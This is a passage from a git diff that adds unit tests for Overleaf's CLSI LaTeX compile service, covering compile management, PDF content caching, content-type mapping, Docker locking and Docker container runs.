parseViewOutput: sinon.stub(), + parseEditOutput: sinon.stub(), + } + + this.dirStats = { + isDirectory: sinon.stub().returns(true), + } + this.fileStats = { + isFile: sinon.stub().returns(true), + } + this.fsPromises = { + lstat: sinon.stub(), + stat: sinon.stub(), + readFile: sinon.stub(), + mkdir: sinon.stub().resolves(), + rm: sinon.stub().resolves(), + unlink: sinon.stub().resolves(), + rmdir: sinon.stub().resolves(), + } + this.fsPromises.lstat.withArgs(this.compileDir).resolves(this.dirStats) + this.fsPromises.stat + .withArgs(Path.join(this.compileDir, 'output.synctex.gz')) + .resolves(this.fileStats) + + this.CompileManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './LatexRunner': this.LatexRunner, + './ResourceWriter': this.ResourceWriter, + './OutputFileFinder': this.OutputFileFinder, + './OutputCacheManager': this.OutputCacheManager, + '@overleaf/settings': this.Settings, + '@overleaf/metrics': { + inc: sinon.stub(), + timing: sinon.stub(), + gauge: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + child_process: this.child_process, + './CommandRunner': this.CommandRunner, + './DraftModeManager': this.DraftModeManager, + './TikzManager': this.TikzManager, + './LockManager': this.LockManager, + './SynctexOutputParser': this.SynctexOutputParser, + 'fs/promises': this.fsPromises, + './CLSICacheHandler': { + notifyCLSICacheAboutBuild: sinon.stub(), + downloadLatestCompileCache: sinon.stub().resolves(), + downloadOutputDotSynctexFromCompileCache: sinon.stub().resolves(), + }, + }, + }) + }) + + describe('doCompileWithLock', function () { + beforeEach(function () { + this.request = { + resources: this.resources, + rootResourcePath: (this.rootResourcePath = 'main.tex'), + project_id: this.projectId, + user_id: this.userId, + compiler: (this.compiler = 'pdflatex'), + timeout: (this.timeout = 42000), + imageName: (this.image = 'example.com/image'), + flags: (this.flags = ['-file-line-error']), + compileGroup: (this.compileGroup = 'compile-group'), + stopOnFirstError: false, + metricsOpts: { + path: 'clsi-perf', + method: 'minimal', + compile: 'initial', + }, + } + this.env = { + OVERLEAF_PROJECT_ID: this.projectId, + } + }) + + describe('when the project is locked', function () { + beforeEach(async function () { + const error = new Error('locked') + this.LockManager.acquire.throws(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejectedWith(error) + }) + + it('should ensure that the compile directory exists', function () { + expect(this.fsPromises.mkdir).to.have.been.calledWith(this.compileDir, { + recursive: true, + }) + }) + + it('should not run LaTeX', function () { + expect(this.LatexRunner.promises.runLatex).not.to.have.been.called + }) + }) + + describe('normally', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should ensure that the compile directory exists', function () { + expect(this.fsPromises.mkdir).to.have.been.calledWith(this.compileDir, { + recursive: true, + }) + }) + + it('should write the resources to disk', function () { + expect( + this.ResourceWriter.promises.syncResourcesToDisk + ).to.have.been.calledWith(this.request, this.compileDir) + }) + + it('should run LaTeX', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: this.rootResourcePath, + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: this.env, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + + it('should find the output files', function () { + expect( + this.OutputFileFinder.promises.findOutputFiles + ).to.have.been.calledWith(this.resources, this.compileDir) + }) + + it('should return the output files', function () { + expect(this.result.outputFiles).to.equal(this.buildFiles) + }) + + it('should not inject draft mode by default', function () { + expect(this.DraftModeManager.promises.injectDraftMode).not.to.have.been + .called + }) + }) + + describe('with draft mode', function () { + beforeEach(async function () { + this.request.draft = true + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should inject the draft mode header', function () { + expect( + this.DraftModeManager.promises.injectDraftMode + ).to.have.been.calledWith(this.compileDir + '/' + this.rootResourcePath) + }) + }) + + describe('with a check option', function () { + beforeEach(async function () { + this.request.check = 'error' + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should run chktex', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: this.rootResourcePath, + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: { + CHKTEX_OPTIONS: '-nall -e9 -e10 -w15 -w16', + CHKTEX_EXIT_ON_ERROR: 1, + CHKTEX_ULIMIT_OPTIONS: '-t 5 -v 64000', + OVERLEAF_PROJECT_ID: this.projectId, + }, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + }) + + describe('with a knitr file and check options', function () { + beforeEach(async function () { + this.request.rootResourcePath = 'main.Rtex' + this.request.check = 'error' + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should not run chktex', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: 'main.Rtex', + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: this.env, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + }) + + describe('when the compile times out', function () { + beforeEach(async function () { + const error = new Error('timed out!') + error.timedout = true + this.LatexRunner.promises.runLatex.rejects(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejected + }) + + it('should clear the compile directory', function () { + for (const { path } of this.buildFiles) { + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/' + path + ) + } + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/main.tex' + ) + expect(this.fsPromises.rmdir).to.have.been.calledWith(this.compileDir) + }) + }) + + describe('when the compile is manually stopped', function () { + beforeEach(async function () { + const error = new Error('terminated!') + error.terminated = true + this.LatexRunner.promises.runLatex.rejects(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejected + }) + + it('should clear the compile directory', function () { + for (const { path } of this.buildFiles) { + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/' + path + ) + } + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/main.tex' + ) + expect(this.fsPromises.rmdir).to.have.been.calledWith(this.compileDir) + }) + }) + }) + + describe('clearProject', function () { + it('should clear the compile directory', async function () { + await this.CompileManager.promises.clearProject( + this.projectId, + this.userId + ) + + expect(this.fsPromises.rm).to.have.been.calledWith(this.compileDir, { + force: true, + recursive: true, + }) + }) + }) + + describe('syncing', function () { + beforeEach(function () { + this.page = 1 + this.h = 42.23 + this.v = 87.56 + this.width = 100.01 + this.height = 234.56 + this.line = 5 + this.column = 3 + this.filename = 'main.tex' + }) + + describe('syncFromCode', function () { + beforeEach(function () { + this.records = [{ page: 1, h: 2, v: 3, width: 4, height: 5 }] + this.SynctexOutputParser.parseViewOutput + .withArgs(this.commandOutput) + .returns(this.records) + }) + + describe('normal case', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.syncFromCode( + this.projectId, + this.userId, + this.filename, + this.line, + this.column, + '' + ) + }) + + it('should execute the synctex binary', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + const inputFilePath = `${this.compileDir}/${this.filename}` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'view', + '-i', + `${this.line}:${this.column}:${inputFilePath}`, + '-o', + outputFilePath, + ], + this.compileDir, + this.Settings.clsi.docker.image, + 60000, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal(this.records) + }) + }) + + describe('with a custom imageName', function () { + const customImageName = 'foo/bar:tag-0' + beforeEach(async function () { + await this.CompileManager.promises.syncFromCode( + this.projectId, + this.userId, + this.filename, + this.line, + this.column, + { imageName: customImageName } + ) + }) + + it('should execute the synctex binary in a custom docker image', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + const inputFilePath = `${this.compileDir}/${this.filename}` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'view', + '-i', + `${this.line}:${this.column}:${inputFilePath}`, + '-o', + outputFilePath, + ], + this.compileDir, + customImageName, + 60000, + {} + ) + }) + }) + }) + + describe('syncFromPdf', function () { + beforeEach(function () { + this.records = [{ file: 'main.tex', line: 1, column: 1 }] + this.SynctexOutputParser.parseEditOutput + .withArgs(this.commandOutput, this.compileDir) + .returns(this.records) + }) + + describe('normal case', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.syncFromPdf( + this.projectId, + this.userId, + this.page, + this.h, + this.v, + { imageName: '' } + ) + }) + + it('should execute the synctex binary', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'edit', + '-o', + `${this.page}:${this.h}:${this.v}:${outputFilePath}`, + ], + this.compileDir, + this.Settings.clsi.docker.image, + 60000, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal(this.records) + }) + }) + + describe('with a custom imageName', function () { + const customImageName = 'foo/bar:tag-1' + beforeEach(async function () { + await this.CompileManager.promises.syncFromPdf( + this.projectId, + this.userId, + this.page, + this.h, + this.v, + { imageName: customImageName } + ) + }) + + it('should execute the synctex binary in a custom docker image', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'edit', + '-o', + `${this.page}:${this.h}:${this.v}:${outputFilePath}`, + ], + this.compileDir, + customImageName, + 60000, + {} + ) + }) + }) + }) + }) + + describe('wordcount', function () { + beforeEach(async function () { + this.timeout = 60 * 1000 + this.filename = 'main.tex' + this.image = 'example.com/image' + + this.result = await this.CompileManager.promises.wordcount( + this.projectId, + this.userId, + this.filename, + this.image + ) + }) + + it('should run the texcount command', function () { + this.filePath = `$COMPILE_DIR/${this.filename}` + this.command = ['texcount', '-nocol', '-inc', this.filePath] + + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + this.command, + this.compileDir, + this.image, + this.timeout, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal({ + encode: 'ascii', + textWords: 2, + headWords: 0, + outside: 0, + headers: 0, + elements: 0, + mathInline: 0, + mathDisplay: 0, + errors: 0, + messages: '', + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ContentCacheManagerTests.js b/services/clsi/test/unit/js/ContentCacheManagerTests.js new file mode 100644 index 0000000..df3bce2 --- /dev/null +++ b/services/clsi/test/unit/js/ContentCacheManagerTests.js @@ -0,0 +1,223 @@ +const fs = require('node:fs') +const Path = require('node:path') +const { expect } = require('chai') + +const MODULE_PATH = '../../../app/js/ContentCacheManager' + +describe('ContentCacheManager', function () { + let contentDir, pdfPath, xrefPath + let ContentCacheManager, files, Settings + before(function () { + Settings = require('@overleaf/settings') + ContentCacheManager = require(MODULE_PATH) + }) + let contentRanges, newContentRanges, reclaimed + async function run(filePath, pdfSize, pdfCachingMinChunkSize) { + const result = await ContentCacheManager.promises.update({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime: 1337, + }) + let newlyReclaimed + ;({ + contentRanges, + newContentRanges, + reclaimedSpace: newlyReclaimed, + } = result) + reclaimed += newlyReclaimed + + const fileNames = await fs.promises.readdir(contentDir) + files = {} + for (const fileName of fileNames) { + const path = Path.join(contentDir, fileName) + files[path] = await fs.promises.readFile(path) + } + } + before(function () { + contentDir = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/content/1797a7f48f9-5abc1998509dea1f' + pdfPath = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/generated-files/1797a7f48ea-8ac6805139f43351/output.pdf' + xrefPath = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/generated-files/1797a7f48ea-8ac6805139f43351/output.pdfxref' + + reclaimed = 0 + Settings.pdfCachingMinChunkSize = 1024 + }) + + before(async function () { + await fs.promises.rm(contentDir, { recursive: true, force: true }) + await fs.promises.mkdir(contentDir, { recursive: true }) + await fs.promises.mkdir(Path.dirname(pdfPath), { recursive: true }) + }) + + describe('minimal', function () { + const PATH_MINIMAL_PDF = 'test/acceptance/fixtures/minimal.pdf' + const PATH_MINIMAL_XREF = 'test/acceptance/fixtures/minimal.pdfxref' + const OBJECT_ID_1 = '9 0 ' + const HASH_LARGE = + 'd7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd' + const OBJECT_ID_2 = '10 0 ' + const HASH_SMALL = + '896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71' + function getChunkPath(hash) { + return Path.join('test/unit/js/snapshots/minimalCompile/chunks', hash) + } + let MINIMAL_SIZE, RANGE_1, RANGE_2, h1, h2, START_1, START_2, END_1, END_2 + before(async function () { + await fs.promises.copyFile(PATH_MINIMAL_PDF, pdfPath) + await fs.promises.copyFile(PATH_MINIMAL_XREF, xrefPath) + const MINIMAL = await fs.promises.readFile(PATH_MINIMAL_PDF) + MINIMAL_SIZE = (await fs.promises.stat(PATH_MINIMAL_PDF)).size + RANGE_1 = await fs.promises.readFile(getChunkPath(HASH_LARGE)) + RANGE_2 = await fs.promises.readFile(getChunkPath(HASH_SMALL)) + h1 = HASH_LARGE + h2 = HASH_SMALL + START_1 = MINIMAL.indexOf(RANGE_1) + END_1 = START_1 + RANGE_1.byteLength + START_2 = MINIMAL.indexOf(RANGE_2) + END_2 = START_2 + RANGE_2.byteLength + }) + async function runWithMinimal(pdfCachingMinChunkSize) { + await run(pdfPath, MINIMAL_SIZE, pdfCachingMinChunkSize) + } + + describe('with two ranges qualifying', function () { + before(async function () { + await runWithMinimal(500) + }) + it('should produce two ranges', function () { + expect(contentRanges).to.have.length(2) + }) + + it('should find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + { + objectId: OBJECT_ID_2, + start: START_2, + end: END_2, + hash: h2, + }, + ]) + }) + + it('should store the contents', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, h2)]: RANGE_2, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [ + [h1, 0], + [h2, 0], + ], + hashSize: [ + [h1, RANGE_1.byteLength], + [h2, RANGE_2.byteLength], + ], + }) + ), + }) + }) + + it('should mark all ranges as new', function () { + expect(contentRanges).to.deep.equal(newContentRanges) + }) + + describe('when re-running with one range too small', function () { + before(async function () { + await runWithMinimal(1024) + }) + + it('should produce one range', function () { + expect(contentRanges).to.have.length(1) + }) + + it('should find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + ]) + }) + + it('should update the age of the 2nd range', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, h2)]: RANGE_2, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [ + [h1, 0], + [h2, 1], + ], + hashSize: [ + [h1, RANGE_1.byteLength], + [h2, RANGE_2.byteLength], + ], + }) + ), + }) + }) + + it('should find no new ranges', function () { + expect(newContentRanges).to.deep.equal([]) + }) + + describe('when re-running 5 more times', function () { + for (let i = 0; i < 5; i++) { + before(async function () { + await runWithMinimal(1024) + }) + } + + it('should still produce one range', function () { + expect(contentRanges).to.have.length(1) + }) + + it('should still find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + ]) + }) + + it('should delete the 2nd range', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [[h1, 0]], + hashSize: [[h1, RANGE_1.byteLength]], + }) + ), + }) + }) + + it('should find no new ranges', function () { + expect(newContentRanges).to.deep.equal([]) + }) + + it('should yield the reclaimed space', function () { + expect(reclaimed).to.equal(RANGE_2.byteLength) + }) + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ContentTypeMapperTests.js b/services/clsi/test/unit/js/ContentTypeMapperTests.js new file mode 100644 index 0000000..a413337 --- /dev/null +++ b/services/clsi/test/unit/js/ContentTypeMapperTests.js @@ -0,0 +1,79 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ContentTypeMapper' +) + +describe('ContentTypeMapper', function () { + beforeEach(function () { + return (this.ContentTypeMapper = SandboxedModule.require(modulePath)) + }) + + return describe('map', function () { + it('should map .txt to text/plain', function () { + const contentType = this.ContentTypeMapper.map('example.txt') + return contentType.should.equal('text/plain') + }) + + it('should map .csv to text/csv', function () { + const contentType = this.ContentTypeMapper.map('example.csv') + return contentType.should.equal('text/csv') + }) + + it('should map .pdf to application/pdf', function () { + const contentType = this.ContentTypeMapper.map('example.pdf') + return contentType.should.equal('application/pdf') + }) + + it('should fall back to octet-stream', function () { + const contentType = this.ContentTypeMapper.map('example.unknown') + return contentType.should.equal('application/octet-stream') + }) + + describe('coercing web files to plain text', function () { + it('should map .js to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.js') + return contentType.should.equal('text/plain') + }) + + it('should map .html to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.html') + return contentType.should.equal('text/plain') + }) + + return it('should map .css to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.css') + return contentType.should.equal('text/plain') + }) + }) + + return describe('image files', function () { + it('should map .png to image/png', function () { + const contentType = this.ContentTypeMapper.map('example.png') + return contentType.should.equal('image/png') + }) + + it('should map .jpeg to image/jpeg', function () { + const contentType = this.ContentTypeMapper.map('example.jpeg') + return contentType.should.equal('image/jpeg') + }) + + return it('should map .svg to text/plain to protect against XSS (SVG can execute JS)', function () { + const contentType = this.ContentTypeMapper.map('example.svg') + return contentType.should.equal('text/plain') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DockerLockManagerTests.js b/services/clsi/test/unit/js/DockerLockManagerTests.js new file mode 100644 index 0000000..f691794 --- /dev/null +++ b/services/clsi/test/unit/js/DockerLockManagerTests.js @@ -0,0 +1,246 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DockerLockManager' +) + +describe('DockerLockManager', function () { + beforeEach(function () { + return (this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { clsi: { docker: {} } }), + }, + })) + }) + + return describe('runWithLock', function () { + describe('with a single lock', function () { + beforeEach(function (done) { + this.callback = sinon.stub() + return this.LockManager.runWithLock( + 'lock-one', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world'), 100), + + (err, ...args) => { + this.callback(err, ...Array.from(args)) + return done() + } + ) + }) + + return it('should call the callback', function () { + return this.callback + .calledWith(null, 'hello', 'world') + .should.equal(true) + }) + }) + + describe('with two locks', function () { + beforeEach(function (done) { + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + this.LockManager.runWithLock( + 'lock-one', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'one'), 100), + + (err, ...args) => { + return this.callback1(err, ...Array.from(args)) + } + ) + return this.LockManager.runWithLock( + 'lock-two', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 200), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return done() + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + + return describe('with lock contention', function () { + describe('where the first lock is released quickly', function () { + beforeEach(function (done) { + this.LockManager.MAX_LOCK_WAIT_TIME = 1000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'one'), 100), + + (err, ...args) => { + return this.callback1(err, ...Array.from(args)) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 200), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return done() + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + + describe('where the first lock is held longer than the waiting time', function () { + beforeEach(function (done) { + let doneTwo + this.LockManager.MAX_LOCK_HOLD_TIME = 10000 + this.LockManager.MAX_LOCK_WAIT_TIME = 1000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + let doneOne = (doneTwo = false) + const finish = function (key) { + if (key === 1) { + doneOne = true + } + if (key === 2) { + doneTwo = true + } + if (doneOne && doneTwo) { + return done() + } + } + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout( + () => releaseLock(null, 'hello', 'world', 'one'), + 1100 + ), + + (err, ...args) => { + this.callback1(err, ...Array.from(args)) + return finish(1) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 100), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return finish(2) + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback with an error', function () { + const error = sinon.match.instanceOf(Error) + return this.callback2.calledWith(error).should.equal(true) + }) + }) + + return describe('where the first lock is held longer than the max holding time', function () { + beforeEach(function (done) { + let doneTwo + this.LockManager.MAX_LOCK_HOLD_TIME = 1000 + this.LockManager.MAX_LOCK_WAIT_TIME = 2000 + this.LockManager.LOCK_TEST_INTERVAL = 100 + this.callback1 = sinon.stub() + this.callback2 = sinon.stub() + let doneOne = (doneTwo = false) + const finish = function (key) { + if (key === 1) { + doneOne = true + } + if (key === 2) { + doneTwo = true + } + if (doneOne && doneTwo) { + return done() + } + } + this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout( + () => releaseLock(null, 'hello', 'world', 'one'), + 1500 + ), + + (err, ...args) => { + this.callback1(err, ...Array.from(args)) + return finish(1) + } + ) + return this.LockManager.runWithLock( + 'lock', + releaseLock => + setTimeout(() => releaseLock(null, 'hello', 'world', 'two'), 100), + + (err, ...args) => { + this.callback2(err, ...Array.from(args)) + return finish(2) + } + ) + }) + + it('should call the first callback', function () { + return this.callback1 + .calledWith(null, 'hello', 'world', 'one') + .should.equal(true) + }) + + return it('should call the second callback', function () { + return this.callback2 + .calledWith(null, 'hello', 'world', 'two') + .should.equal(true) + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DockerRunnerTests.js b/services/clsi/test/unit/js/DockerRunnerTests.js new file mode 100644 index 0000000..d70aab5 --- /dev/null +++ b/services/clsi/test/unit/js/DockerRunnerTests.js @@ -0,0 +1,981 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/DockerRunner' +) +const Path = require('node:path') + +describe('DockerRunner', function () { + beforeEach(function () { + let container, Docker, Timer + this.container = container = {} + this.DockerRunner = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { + clsi: { docker: {} }, + path: {}, + }), + dockerode: (Docker = (function () { + Docker = class Docker { + static initClass() { + this.prototype.getContainer = sinon.stub().returns(container) + this.prototype.createContainer = sinon + .stub() + .yields(null, container) + this.prototype.listContainers = sinon.stub() + } + } + Docker.initClass() + return Docker + })()), + fs: (this.fs = { + stat: sinon.stub().yields(null, { + isDirectory() { + return true + }, + }), + }), + './Metrics': { + Timer: (Timer = class Timer { + done() {} + }), + }, + './LockManager': { + runWithLock(key, runner, callback) { + return runner(callback) + }, + }, + }, + globals: { Math }, // used by lodash + }) + this.Docker = Docker + this.getContainer = Docker.prototype.getContainer + this.createContainer = Docker.prototype.createContainer + this.listContainers = Docker.prototype.listContainers + + this.directory = '/local/compile/directory' + this.mainFile = 'main-file.tex' + this.compiler = 'pdflatex' + this.image = 'example.com/overleaf/image:2016.2' + this.env = {} + this.callback = sinon.stub() + this.project_id = 'project-id-123' + this.volumes = { '/some/host/dir/compiles/directory': '/compile' } + this.Settings.clsi.docker.image = this.defaultImage = 'default-image' + this.Settings.path.sandboxedCompilesHostDirCompiles = + '/some/host/dir/compiles' + this.Settings.path.sandboxedCompilesHostDirOutput = '/some/host/dir/output' + this.compileGroup = 'compile-group' + return (this.Settings.clsi.docker.env = { PATH: 'mock-path' }) + }) + + afterEach(function () { + this.DockerRunner.stopContainerMonitor() + }) + + describe('run', function () { + beforeEach(function (done) { + this.DockerRunner._getContainerOptions = sinon + .stub() + .returns((this.options = { mockoptions: 'foo' })) + this.DockerRunner._fingerprintContainer = sinon + .stub() + .returns((this.fingerprint = 'fingerprint')) + + this.name = `project-${this.project_id}-${this.fingerprint}` + + this.command = ['mock', 'command', '--outdir=$COMPILE_DIR'] + this.command_with_dir = ['mock', 'command', '--outdir=/compile'] + this.timeout = 42000 + return done() + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + (err, output) => { + this.callback(err, output) + return done() + } + ) + }) + + it('should generate the options for the container', function () { + return this.DockerRunner._getContainerOptions + .calledWith( + this.command_with_dir, + this.image, + this.volumes, + this.timeout + ) + .should.equal(true) + }) + + it('should generate the fingerprint from the returned options', function () { + return this.DockerRunner._fingerprintContainer + .calledWith(this.options) + .should.equal(true) + }) + + it('should do the run', function () { + return this.DockerRunner._runAndWaitForContainer + .calledWith(this.options, this.volumes, this.timeout) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('standard compile', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/compiles/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + return expect(volumes).to.deep.equal({ + '/some/host/dir/compiles/xyz': '/compile', + }) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('synctex-output', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/output/xyz/generated-files/id' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'synctex-output', + this.callback + ) + }) + + it('should re-write the bind directory and set ro flag', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + '/some/host/dir/output/xyz/generated-files/id': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('synctex', function () { + beforeEach(function () { + this.directory = '/var/lib/overleaf/data/compile/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'synctex', + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + '/some/host/dir/compiles/xyz': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('wordcount', function () { + beforeEach(function () { + this.directory = 